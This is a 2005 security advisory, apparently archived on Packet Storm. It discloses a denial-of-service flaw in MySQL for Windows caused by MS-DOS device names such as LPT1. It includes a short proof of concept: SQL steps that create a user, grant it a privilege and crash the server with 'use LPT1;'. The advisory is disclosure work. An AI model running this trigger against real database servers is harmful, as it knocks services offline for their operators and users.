exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

mysqlDoS.txt

mysqlDoS.txt
Posted Mar 22, 2005
Authored by Luca Ercoli

MySQL versions 4.1.x, 4.0.x, and 5.0.x are all susceptible to a denial of service attack due to a problem with handling device names.

tags | advisory, denial of service
SHA-256 | e7b0f006e157c78b597991a04a36c0cebb80da3406e01d2ed57a7bd477e1bf1f

mysqlDoS.txt

Change Mirror Download


Package: MySQL Database Server for Windows
Auth: https://www.mysql.com/
Version(s): 4.1.XX/4.0.XX/5.0.XX
Vulnerability Type: Denial of Service




Disclaimer:
==========

The information is provided "as is" without warranty of any kind.
The author of this issue shall not be held liable for any
downtime, lost profits, or damages due to the informations
contained in this advisory.




What’s MySQL:
============

MySQL is a multi-user, multi-threaded relational database management system.
The MySQL database server is the world's most popular open source database.





Vulnerability Description:
=========================


A vulnerability exist in the way application handle requests
containing reserved MS-DOS devices name (AUX,CON,COM1,LPT1 and PRN).
This flaw allows an authenticaded user with at least one of those
privileges globally (on *.*):

- REFERENCES
- CREATE TEMPORARY TABLES
- GRANT OPTION
- CREATE
- SELECT

to cause the service to fail.






Proof of Concept:
================



1- Create an user account:

(connected as 'root')

use mysql;
INSERT INTO user (Host,User,Password) VALUES('%','customer',PASSWORD('customer'));



2- Grant to him one or more privileges reported above:

(connected as 'root')

GRANT CREATE TEMPORARY TABLES ON *.* TO 'customer'@'%';
flush privileges;


3- Connect to server using new account and 'use' the database 'LPT1':

(connected as 'customer')
use LPT1;







Vendor Status:
=============


https://bugs.mysql.com/

ID: 9148
Updated by: Miguel Solorzano
Reported by: Luca Ercoli
User Type: User
Status: Verified
Severity: S2 (Serious)
Category: Server
Operating System: Windows
-Version: 4.1.9
+Version: 4.1.XX/4.0.XX/5.0.XX














Credits:
---

Luca Ercoli
io [at] lucaercoli.it
www.lucaercoli.it
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close